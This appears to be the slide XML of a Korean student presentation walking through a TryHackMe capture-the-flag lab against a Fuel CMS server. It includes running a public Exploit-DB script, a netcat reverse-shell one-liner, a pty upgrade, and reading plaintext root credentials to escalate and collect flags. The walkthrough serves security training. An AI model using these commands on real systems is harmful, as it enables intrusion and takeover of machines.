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5" r:id="rId13"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="264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AC31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681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232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436179-D3F0-7288-9E2E-9E0BB06320C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101600" y="5257800"/>
            <a:ext cx="120468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8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62542-1DBE-EAD3-A5FB-99D67E87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99EC4-9240-958A-62D2-ADCA220E6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D4D6D-1825-2916-A479-6BF8D3A0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5318C-FC3F-9281-3A2E-9106E2C4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4D0D4-220E-2BCB-49EA-4569FDF2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90FD42-1113-AF3B-05C2-6B3B046E8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411BB-BBB2-CD07-EBC3-214EF8437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8360E-52B2-010E-8E2C-571E3D34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87D52-1120-F8C5-9B91-698D0B8F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114D6-8701-7DB0-F4BE-FB4F2E77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3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C2E27-DBB6-4359-C23D-507621A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33333-7301-FFA1-3511-9943230E1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2A602-B7EB-77E4-E262-15BBC8B9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34297-3637-5E4E-9729-4AF5AC27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C2A3D-D1AC-120B-1480-CEEAD5E1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3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F67D5-0CF3-0132-DAFE-BC9C9BA6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DD3B6-7DCB-A608-3455-08AA7809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55E6-3A7E-E5EC-EC3C-CA49FF13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2D43D-6F0F-CD99-E6B4-C2E0ADC7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2206E-C7A5-0B80-7215-5A0D2FCE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5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6CCB-764D-C731-2360-6A5A0927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92CC0-AC5B-6439-83FB-AD0C62EF1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878E0A-0827-0B8D-43A2-C16996E65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A5195-9320-554F-610C-16F71ACB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531AA8-3899-2546-D4B8-1E6A08F3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A755E-23A6-2FE4-99E1-D4DD9F18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7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D0358-671B-30C0-6B84-EA65456D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FAE72C-94AD-7186-C189-09C74A93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E0BB63-A46D-AA7F-C160-ACA8BA520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C9DD52-993A-F05D-3E36-2973A6A5F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C2051-0774-AC83-D8FB-A95E666F0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CD2A43-FC65-0E95-963D-E0ECCAB1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5DD6E-EB72-A02B-360E-67464961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DC65F5-3382-DC48-1791-49B2ED83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1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A9BD9-F40B-2793-6AF2-C87DA476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702FC-A94A-4091-6F97-A97BA91D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47686-50BB-4B2B-1B18-3105746C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6617D4-2CC6-7805-11A9-333B8B4A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5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EB2403-8342-64B8-50B3-4F49EE0F7CFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5388428"/>
            <a:ext cx="12192000" cy="1469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4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2F701-97EE-D5E0-B8EC-F4CBFFCD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9B22C-E889-751D-414F-C7AE5D45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A38FAF-076B-EAEB-4C3E-799F2E24F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59391-85CD-D9F0-6912-60556384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E612F-2186-5DD6-5E4B-E4045E94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D2E420-4A4D-2153-2D79-A27FEBE6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2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E908-8819-AA3C-4B5D-DB686BE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A339D5-1C52-32A8-D2BB-599B10D5F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9FEC5-8F19-8859-8EFE-BC8F1B878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E35E90-B6AB-6982-5D5B-341634DF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0AC17-9250-6FE2-0A3D-665299A3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FFE175-0D22-BF15-359C-DDCAEB8A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77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3EC638-8F83-D946-2747-02EAA7B9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B79AA-80B8-4765-2C90-532FA4DD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94977-7D7D-BE44-4630-F742D7D8B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135CF-A6BA-4EB6-BD4C-2E514AEBEC85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4F169-E14B-CBE6-7233-0F644BD31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02F846-8641-04FC-E0A6-5C4398909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EC548-F230-4599-A5EF-9C73652CC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9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hyperlink" Target="http://www.exploit-db.com/exploits/50477" TargetMode="External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hyperlink" Target="http://10.10.142.203&#47196;" TargetMode="External"></Relationship><Relationship Id="rId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CA57F-E4BC-E612-BE4A-83EDF7F01563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1948069" y="2321004"/>
            <a:ext cx="82958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dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="HY견고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY견고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2022134016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6600" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="HY견고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY견고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>한진만</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6600" dirty="0">
              <a:ln w="0"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3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B633DD-9A7A-68E0-D24C-7C938A5C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848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0" y="5513705"/>
            <a:ext cx="11895455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ryHac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k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Me 사이트에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서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V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P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N 설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치 후 c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d Down* 명령어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vpn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이 다운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되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어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디렉토리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이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동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o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pen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ryHackMe 아이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디)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.o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v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pn 명령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어로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14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번 줄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옵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션 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수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정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수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정 후 옵션 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR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--data-ciphers AES-256-CBC:AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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수정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완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료 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op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e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nvpn (TryHackMe 아이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디)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.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ov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pn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7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14F47-68AD-0694-44B9-0E919352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848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-3175" y="5384800"/>
            <a:ext cx="12040235" cy="1354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ryHackMe에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서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배정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된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IP : 10.10.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34.198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위에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배정받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은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IP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이용해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서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n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m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ap 스캔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통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해 확인해보니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80/tc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p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포트가 h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p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ser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v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ice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)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열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려진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상태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확인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할 수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음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파이어폭스를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키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고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10.10.234.198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접속해보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니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Fuel CMS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라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웹사이트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열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려있는 걸 볼 수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음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F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uel cms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검색하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니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exploit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하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는 걸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인 할 수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음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www.exploit-db.com/ex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p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loits/50477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이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사이트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에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익스플로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잇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코드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음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7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C8BCC-F3E6-AA42-FFF0-13515DDE8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848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0" y="5384800"/>
            <a:ext cx="12187555" cy="12757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c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d Down*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명령어로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방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금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다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운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받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은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50477.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 p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y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가 있는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디렉토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리로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이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동 python3 50477.py -u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http://10.10.142.203로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실</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="HY견고딕" charset="0"/>
                <a:ea typeface="HY견고딕" charset="0"/>
              </a:rPr>
              <a:t>행</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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다른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터미널에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서 n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c -lvp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&lt;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por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&gt;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 (-l(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Listen mode): 연결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을 할 수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게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계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속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요청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듣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고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게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해주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옵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션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-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(V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er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b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ose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)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 : 상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세 정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보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보여주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옵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션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-p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(p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ort) : 포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트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요약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,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 몇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번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포트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연결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을 기다리고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게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해준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다.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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0477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실행하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고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터미널에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rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc &lt;ip addr show tun0으로 나온 ip&gt; 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&lt;p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or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t&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="HY견고딕" charset="0"/>
                <a:ea typeface="HY견고딕" charset="0"/>
              </a:rPr>
              <a:t> &gt;/tmp/f</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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이후 p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ython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-c ‘import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p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ty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;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 pty.spawn(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”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/bin/bash”)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’를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입력하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여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chea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 s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h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eet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더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욱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활성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화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시킨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다</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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s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통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해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확인해보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니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robots.txt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인 할 수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음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cat 명령어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이용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해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확인해보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니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/fuel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페이지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존재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="HY견고딕" charset="0"/>
                <a:ea typeface="HY견고딕" charset="0"/>
              </a:rPr>
              <a:t>함</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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3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아빠/AppData/Roaming/PolarisOffice/ETemp/21700_23484736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5416550"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/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0" y="5410835"/>
            <a:ext cx="1230884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s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를 사용해 디렉토리를 확인해본 후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cd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a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pplicat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i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on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을 이용해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application 디렉토리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이동한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다.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a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pplication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디렉토리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에서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ls 명령어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사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용하여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디렉토리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확인해보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니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confi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g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디렉토리가 있다.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 cd config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이용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해 c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onfig 디렉토리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로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이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동 후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ls 명령어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사용하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니 d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atabase.php 파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일이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것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확인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할 수 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 sz="1400">
                <a:solidFill>
                  <a:srgbClr val="DBDEE1"/>
                </a:solidFill>
                <a:latin typeface="HY견고딕" charset="0"/>
                <a:ea typeface="HY견고딕" charset="0"/>
              </a:rPr>
              <a:t>다. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="DBDEE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8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F585C-0F79-E69F-6118-E55009EC7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848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0" y="5384800"/>
            <a:ext cx="12174855" cy="9226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database.php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파일을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cat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명령어를 이용해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파일을 확인해보니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id: root passwd: mememe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임을 확인 할 수 있다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.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s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udo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s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u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명령어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사용하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고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mememe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입력하여 r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oot 계정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탈취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한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것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인 할 수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다. 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1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6E6688-2AC1-CD4D-B5B4-A7A4FED2F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000" cy="5428615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12700" y="5505450"/>
            <a:ext cx="12174855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R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oot 계정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탈취하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여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cd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/ro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o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로 디렉토리를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이동하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고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ls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명령어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사용하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면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root.txt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는 것을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인 할 수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다.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c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at root.txt 명령어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이용하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여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Root.txt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의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flag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인 할 수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있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을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것이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다.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29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0C0787-B8A9-39D2-1B88-86C4FBEC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195"/>
            <a:ext cx="12192000" cy="5464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03CD0-E562-9B3A-64E4-FDC1BCE735DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5428615"/>
            <a:ext cx="10044430" cy="11995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cd /home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후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ls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명령어 사용시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www-data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 사용자가 있고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사용자 디렉터리로 이동하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여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ls 명령어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사용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해 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보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니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flag.txt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가 있다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cat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명령어를 사용해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flag.txt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를 통해 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user.txt f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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="HY견고딕" charset="0"/>
                <a:ea typeface="HY견고딕" charset="0"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="HY견고딕" charset="0"/>
                <a:ea typeface="HY견고딕" charset="0"/>
              </a:rPr>
              <a:t>까지 얻어 낼 수 있다</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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3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</Pages>
  <Paragraphs>21</Paragraphs>
  <Words>235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찬혁 여</dc:creator>
  <cp:lastModifiedBy>흑월 TV</cp:lastModifiedBy>
  <dc:title>PowerPoint 프레젠테이션</dc:title>
  <cp:version>9.104.165.50235</cp:version>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-23T14:26:23Z</dcterms:modified>
</cp:coreProperties>
</file>